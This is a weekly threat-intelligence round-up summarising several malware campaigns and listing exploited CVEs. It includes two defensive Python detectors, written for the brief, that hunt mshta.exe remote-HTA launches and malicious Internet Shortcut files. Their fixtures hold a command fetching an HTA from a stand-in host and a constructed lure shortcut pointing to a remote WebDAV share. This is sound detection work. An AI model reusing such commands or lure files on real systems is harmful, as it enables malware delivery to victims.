The Silobreaker Weekly Geopolitical Risk Briefs

Weekly Cyber Round-up

Intelligence Report

March 13, 2025

Storm-0408 malvertising campaign infects thousands of devices to steal data and credentials

In December 2024, Microsoft researchers discovered a large-scale malvertising campaign, attributed to the threat actor Microsoft tracks as Storm-0408, that compromised nearly one million devices for information theft. The campaign uses a modular, multi-stage approach to payload delivery, execution, and persistence, staging its malware on GitHub repositories, Discord, and Dropbox. It delivers infostealers such as Lumma Stealer and an updated version of Doenerium, along with the NetSupport remote access tool, and relies heavily on living-off-the-land binaries and scripts. Initial infection begins on illegal streaming websites carrying embedded malvertising redirectors, which send victims through an intermediary site before landing on GitHub; the malware hosted in the GitHub repository acts as a first-stage dropper for the additional payloads.

SideWinder APT updates toolset and infrastructure to target maritime and nuclear sectors

Kaspersky researchers observed that the advanced persistent threat (APT) group SideWinder updated its toolset and built out extensive new infrastructure in H2 2024. SideWinder's targeting remains largely unchanged, though the researchers noted a marked increase in attacks against maritime infrastructure, logistics companies, and nuclear energy entities. Countries targeted with the updated malware include Vietnam, Cambodia, Bangladesh, the United Arab Emirates, Djibouti, and Egypt. The infection pattern in the new attacks is consistent with SideWinder's earlier attack chains, but the RTF exploit document now carries updated shellcode that runs embedded JavaScript, which in turn invokes mshta to download a malicious HTA file from a remote server. The final payloads also remain consistent, though they involve new variants of the Backdoor Loader used to sideload the StealerBot implant.
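
The mshta step in that chain is a living-off-the-land pattern that is straightforward to hunt for in process-creation telemetry. The Python below is an added example written for this brief, not Kaspersky's code or a Silobreaker tool: it scans constructed, Sysmon-style process-creation records (the key="value" layout and every host, path and URL in SAMPLE_LOG are made up for the example) and flags mshta.exe invoked with a remote http(s) URL, raising the severity when the parent is an Office application or script host. The SUSPICIOUS_PARENTS list is an assumption chosen for illustration and should be tuned to the environment.

```python
"""Flag mshta.exe launches that pull a remote HTA, from Sysmon-style process records.

Added example for this brief; not Kaspersky's code. The log format below is a
constructed key="value" rendering of Sysmon Event ID 1 fields, and all hosts,
paths and URLs in SAMPLE_LOG are made up.
"""
import ntpath
import re
from typing import Dict, List, Optional

KV_RE = re.compile(r'(\w+)="([^"]*)"')
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Assumption for the example: parents that should essentially never spawn mshta.exe
# in normal use. Office applications and script hosts cover the RTF -> JavaScript ->
# mshta chain described above; tune this set to your environment.
SUSPICIOUS_PARENTS = {
    "winword.exe", "excel.exe", "powerpnt.exe",
    "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe",
}

# Constructed sample records (not real telemetry).
SAMPLE_LOG = [
    r'UtcTime="2025-03-05 09:12:41" Image="C:\Windows\System32\mshta.exe" CommandLine="mshta.exe http://203.0.113.7/update.hta" ParentImage="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"',
    r'UtcTime="2025-03-05 09:13:02" Image="C:\Windows\System32\mshta.exe" CommandLine="mshta.exe C:\Tools\inventory.hta" ParentImage="C:\Windows\explorer.exe"',
    r'UtcTime="2025-03-05 09:14:10" Image="C:\Windows\System32\notepad.exe" CommandLine="notepad.exe" ParentImage="C:\Windows\explorer.exe"',
    r'UtcTime="2025-03-05 09:15:55" Image="C:\Windows\SysWOW64\mshta.exe" CommandLine="mshta https://203.0.113.7/s.hta" ParentImage="C:\Windows\System32\svchost.exe"',
]


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key="value" record into a dict; an unknown layout yields an empty dict."""
    return dict(KV_RE.findall(line))


def classify(event: Dict[str, str]) -> Optional[str]:
    """Return an alert string for a suspicious mshta.exe launch, or None."""
    image = ntpath.basename(event.get("Image", "")).lower()
    if image != "mshta.exe":
        return None
    parent = ntpath.basename(event.get("ParentImage", "")).lower() or "unknown"
    urls = URL_RE.findall(event.get("CommandLine", ""))
    when = event.get("UtcTime", "?")
    if urls:
        # A remote HTA is the core of the chain; a suspicious parent makes it worse.
        severity = "high" if parent in SUSPICIOUS_PARENTS else "medium"
        return f"{severity}: mshta.exe loading remote HTA {urls[0]} (parent {parent}, {when})"
    if parent in SUSPICIOUS_PARENTS:
        # A local HTA from an Office/script parent is still unusual; keep it visible.
        return f"low: mshta.exe spawned by {parent} without a URL argument ({when})"
    return None


def scan(lines: List[str]) -> List[str]:
    """Run classify() over raw records and collect the alerts in log order."""
    alerts = []
    for line in lines:
        alert = classify(parse_event(line))
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Run against the sample, the WINWORD.EXE-spawned mshta with an HTTP URL comes back as high, the svchost-spawned one as medium, and the local inventory.hta launch from Explorer is left alone, which is the distinction a triage queue needs.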

Desert Dexter campaign leverages social media to target MENA region with AsyncRAT

In February 2025, Positive Technologies researchers identified a malicious campaign, active since September 2024, that uses social media to distribute a modified version of AsyncRAT. The campaign has hit approximately 900 victims across the Middle East and North Africa (MENA). The attackers create fake news groups on Facebook and publish advertisements containing links to a file-sharing service or to Telegram channels impersonating legitimate media companies. A custom reflective loader injects the modified AsyncRAT, whose altered IdSender module checks the victim's browser for a two-factor authentication extension and various cryptocurrency wallet extensions. The malware also includes an offline keylogger and communicates with its operators through a Telegram bot. Based on messages and screenshots that were sent to the Telegram bot, the campaign has been attributed to a threat actor dubbed Desert Dexter.

Blind Eagle targets Colombian institutions with Remcos RAT and other commodity malware

Check Point researchers observed a series of ongoing campaigns, attributed to the Blind Eagle threat actor, that have targeted Colombian judicial institutions and government entities since November 2024. The group appears to have expanded its toolkit with additional commodity tooling, such as the HeartCrypt packer, while its final payload continues to be Remcos RAT, hosted on legitimate file-sharing platforms. The campaigns deliver malicious .url files that trigger a WebDAV request when the user interacts with the file, which lets the attackers monitor user interaction with the lure and then download and execute the next-stage payload. The technique resembles the exploitation of CVE-2024-43451, but this variant does not leak the victim's NTLMv2 hash. One campaign observed in December 2024 hit more than 1,600 victims, a significant infection count compared with Blind Eagle's typically targeted approach.
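
The .url trick works because Windows Explorer resolves UNC and WebDAV paths named in an Internet Shortcut on minimal user interaction, including the IconFile entry it reads to render the file's icon. As an added example (not Check Point's code and not part of the original brief), the Python below parses .url files and reports any URL= or IconFile= entry that points at a remote host, covering the \\host@80\DavWWWRoot WebDAV form as well as plain UNC and file://host paths. The two sample shortcuts and the 192.0.2.10 address are constructed for the example.

```python
"""Report Internet Shortcut (.url) entries that would make Windows contact a remote host.

Added example for this brief; not Check Point's code. The two sample shortcuts
below are constructed, and 192.0.2.10 is a documentation address.
"""
import configparser
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

# UNC paths, including the WebDAV forms Explorer understands:
#   \\host\share\...   \\host@80\DavWWWRoot\...   \\host@SSL@443\DavWWWRoot\...
UNC_RE = re.compile(r"^\\\\(?P<host>[^\\@]+)(?:@SSL)?(?:@\d+)?\\", re.IGNORECASE)

# Constructed benign shortcut: an ordinary web link, nothing fetched on render.
BENIGN_URL_FILE = """[InternetShortcut]
URL=https://www.example.com/
IconIndex=0
"""

# Constructed lure: both the target and the icon live on an attacker WebDAV share,
# so rendering the icon alone already produces an outbound WebDAV request.
SUSPICIOUS_URL_FILE = r"""[InternetShortcut]
URL=\\192.0.2.10@80\DavWWWRoot\docs\notificacion.pdf
IconFile=\\192.0.2.10@80\DavWWWRoot\docs\pdf.ico
IconIndex=1
"""


def remote_host(value: str) -> Optional[str]:
    """Return the remote host a shortcut value would reach, or None for local/web values."""
    v = value.strip().strip('"')
    m = UNC_RE.match(v)
    if m:
        return m.group("host").lower()
    parsed = urlparse(v)
    if parsed.scheme.lower() == "file" and parsed.hostname:
        # file://host/share/... is treated as a UNC path on Windows.
        return parsed.hostname.lower()
    return None


def parse_url_file(text: str) -> Dict[str, str]:
    """Parse the [InternetShortcut] section into a lower-cased key -> value map."""
    cp = configparser.RawConfigParser(strict=False, allow_no_value=True, delimiters=("=",))
    cp.optionxform = str  # keep original casing; normalised below
    try:
        cp.read_string(text)
    except configparser.Error:
        return {}
    if not cp.has_section("InternetShortcut"):
        return {}
    return {k.lower(): (v or "") for k, v in cp.items("InternetShortcut")}


def analyse_url_file(text: str) -> List[str]:
    """List findings of the form kind:host for each entry that points off-host."""
    fields = parse_url_file(text)
    findings = []
    icon_host = remote_host(fields.get("iconfile", ""))
    if icon_host:
        # Explorer fetches the icon to render the file; no click is needed.
        findings.append(f"remote_icon:{icon_host}")
    target_host = remote_host(fields.get("url", ""))
    if target_host:
        # A UNC/WebDAV target is fetched over SMB/WebDAV when the shortcut is opened.
        findings.append(f"unc_target:{target_host}")
    return findings


if __name__ == "__main__":
    print("benign     ->", analyse_url_file(BENIGN_URL_FILE))
    print("suspicious ->", analyse_url_file(SUSPICIOUS_URL_FILE))
```

A remote_icon finding is the one to prioritise: it fires before the user has opened anything, which is the same low-interaction property that made the CVE-2024-43451 pattern dangerous, even though this Blind Eagle variant does not leak the NTLMv2 hash.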

Fake GitHub repositories used to distribute SmartLoader and Lumma Stealer

Trend Micro researchers identified an ongoing campaign that uses fake GitHub repositories to distribute SmartLoader, which subsequently delivers Lumma Stealer and other malicious payloads. The repositories are disguised as gaming cheats, cracked software, and cryptocurrency utilities. Once a victim is infected, the attackers can steal sensitive information, including cryptocurrency wallets, two-factor authentication extension data, login credentials, and other personally identifiable information. The researchers noted that the campaign overlaps with one observed in October 2024: both use Lua scripts to deliver SmartLoader and ultimately Lumma Stealer, and both rely on GitHub for distribution. The October 2024 campaign, however, served the malicious files as GitHub file attachments rather than from the releases section of the fake repositories.

High Priority Vulnerabilities

CVE ID           Software                    Base Score   Temporal Score
CVE-2024-4577    PHP                         9.8          7.0
  Related: Campaign exploiting PHP remote code execution flaw displays wider exploitation pattern
CVE-2023-1389    TP-Link Archer AX21         9.8          9.4
  Related: Ballista botnet exploits remote code execution flaw in TP-Link Archer to spread
CVE-2025-1316    Edimax IC-7100 IP Camera    9.8          9.8
  Related: Edimax Camera Zero-Day Disclosed by CISA Exploited by Botnets
CVE-2024-13159   Ivanti Endpoint Manager     9.8          9.4
  Related: CISA Adds Five Actively Exploited Vulnerabilities in Advantive VeraCore and Ivanti EPM to KEV List
CVE-2024-21893   Ivanti Policy Secure        8.2          8.2
  Related: Over 400 IPs Exploiting Multiple SSRF Vulnerabilities in Coordinated Cyber Attack
